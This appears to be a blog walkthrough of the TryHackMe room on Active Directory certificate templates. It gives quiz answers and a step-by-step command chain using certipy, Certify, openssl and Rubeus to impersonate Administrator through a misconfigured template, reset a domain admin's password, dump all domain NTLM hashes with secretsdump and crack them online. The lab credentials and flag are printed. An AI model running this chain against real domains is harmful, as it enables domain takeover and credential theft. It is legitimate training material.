TL;DR Walkthrough of the TryHackMe room AD Certificate Templates and a brief overview of what they missed.
THM Walkthroughs:
A full list of our TryHackMe walkthroughs and cheatsheets is here.
Background
This room provides a brief overview of AD CS and the potential for misconfigurations that can lead to abuse. It is very brief, but recommends reading SpectreOps whitepaper titled Certified Pre-owned, which is excellent advice. The room’s title is odd as it leaves out the ‘CS’ in ‘AD CS templates’. IMHO this matters as Certificate Services (CS) is not enabled in Active Directory (AD) by default.
The room was also a bit odd as it stressed using the GUI to abuse a template. Here at test.local we don’t like to do anything in the GUI if it can be avoided, Group Policy being one of those few GUI use cases. CLIs are important because if you can accomplish something in the CLI then you are halfway or more towards automating it.
Like many TryHackMe rooms, this one is artificially constrained by the requirement to put everything on one VM. Therefore we are attacking AD CS while logged on interactively to the CA, which is also the DC. This makes the attack play out slightly differently as seen in Task 5.
The room I created on TryHackMe was likewise constrained. I had wanted to bring Mishky’s AD Range to TryHackMe.
— — Task 1 — -
Read the above
No answer needed
— — Task 2 — -
Read the above
No answer needed
What does the user create to ask the CA for a certificate?
Certificate Signing Request
What is the name of Microsoft’s PKI implementation?
Active Directory Certificate Services
— — Task 3 — -
What AD group will allow all AD user accounts to request a certificate?
Domain Users
What AD group will allow all domain-joined computers to request a certificate?
Domain Computers
Which EKU allows us to use the generated certificate for Kerberos authentication?
Client Authentication
Which certificate template is misconfigured based on the three provided parameters?
certipy-ad find -u 'thm@lunar.eruca.com' -p Password1\@ -dc-ip 10.10.165.85 -vulnerable -enabled -old-bloodhoundlunar-LUNDC-CA = CA Name
UserRequest = Template Name
User Request = Display Name
‘User Request’ is the answer TryHackMe wants, however the HTTPSWebServer template is also vulnerable.
Cerfity.exe can be used on Windows to find these vulnerable templates.
.\Certify.exe find /vulnerable
— — Task 4 — -
In which field do we inject the User Principal Name of the account we want to impersonate?
Subject Alternative Name
If we had administrative access, when adding the snap-in, which option would we select to use the machine account of the host instead of our authenticated AD account for certificate generation?
Computer account
Follow the steps above and generate your very own privilege escalation certificate
No answer needed
— — Task 5 — -
What is the value of the flag stored on the Administrator’s Desktop?
xfreerdp /v:10.10.2.232 /u:thm /p:Password1\@ /dynamic-resolutionDefender isn’t enabled on this VM, so one can simply copy/paste Certify, openssl, and Rubeus to thm’s Desktop. Certify is used for the request, the output is saved to cert.pem on the Desktop, then exported to cert.pfx using openssl, and finally used to request a ticket with Rubeus.
Normally one would pass the ticket and use it with PsTools to get a network logon to another domain system as the user we are impersonating, but in this case there is only the one VM. Therefore TryHackMe wants us to use the ticket to reset another administrators password.
.\CertifyII.exe request /ca:LUNDC.lunar.eruca.com\lunar-LUNDC-CA /template:HTTPSWebServer /altname:Administrator
.\openssl\openssl\openssl.exe pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Password12!@ [Enter twice to confirm]
.\Rubeus.exe asktgt /user:Administrator /certificate:C:\Users\thm\Desktop\cert.pfx /password:Password12!@ /outfile:cert.kirbi /domain:lunar.eruca.com /dc:10.10.2.232
.\Rubeus.exe changepw /ticket:C:\Users\thm\Desktop\cert.kirbi /new:Password12!@ /dc:LUNDC.lunar.eruca.com /targetuser:lunar.eruca.com\da-clloydRun PowerShell_ISE or PowerShell as da-clloyd using the password we just set.
icacls C:\Users\Administrator /grant lunar\da-clloyd:F
Get-Content C:\Users\Administrator\Desktop\flag.txt
THM{AD.Certs.Can.Get.You.DA}
While we have admin let’s dump everyone’s NTLM so we can feed it into crackstation.net later. Attackers would do this to check for password re-use as Dave in Accounting might just be using the same password for the company’s bank account.
python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -just-dc da-clloyd:Password12\!\@@10.10.2.232 > ADCS.txtOne can easily copy/paste that file over to Windows and parse out just the NTLM hashes via:
$Hashes = Get-Content ".\ADCS.txt"
ForEach($Hash in $Hashes)
{$Hash.split(':')[3] | Out-File ".\AD CS\Hashes.txt" -Append
}Crackstation.net only accepts 20 hashes at a time, so
Get-Content ".\Hashes.txt" | Select-Object -First 20We get 2 hits immediately. I tried another random batch of 20 and got 1 hit.
— — Task 6 — -
Read the above
No answer needed
— — Task 7 — -
Read the above
No answer needed
Summary
Overall this room was a good introduction to AD CS. It did leave out a few key things IMHO, namely the location in AD where the template objects are stored, what their attributes look like and what they mean, and what to watch out for regarding their DACLs.
Like the author of this TryHackMe room, I highly recommend reading SpectreOps whitepaper on AD CS, or at least read their article summarizing it here. If you want to try a slightly more nuanced AD CS abuse, along with everything from DACL abuse to credential dumping then try out Mishky’s AD Range, located on GitHub here.
There’s nothing inherently wrong with AD CS, it’s secure by default, and it’s required for smartcards which are definitely good for security. It’s important however to watch out for misconfigurations. Much like a misconfiguration in AD, one in AD CS can allow an attacker to seize control.
References
Certified Pre-Owner: https://posts.specterops.io/certified-pre-owned-d95910965cd2
PowerShell PKI Module: https://www.pkisolutions.com/tools/pspki
Install NuGet: https://stackoverflow.com/questions/16657778/install-nuget-via-powershell-script
Add-CATemplate, publish a template: https://learn.microsoft.com/en-us/powershell/module/adcsadministration/add-catemplate?view=windowsserver2022-ps
How to enumerate AD CS: https://www.blackhillsinfosec.com/abusing-active-directory-certificate-services-part-one/
Abusing ‘Dangerous Rights’ on AD CS templates: https://github.com/daem0nc0re/Abusing_Weak_ACL_on_Certificate_Templates
Certified Pre-Owned summary: https://posts.specterops.io/certified-pre-owned-d95910965cd2
Certified Pre-Owned white paper: https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf
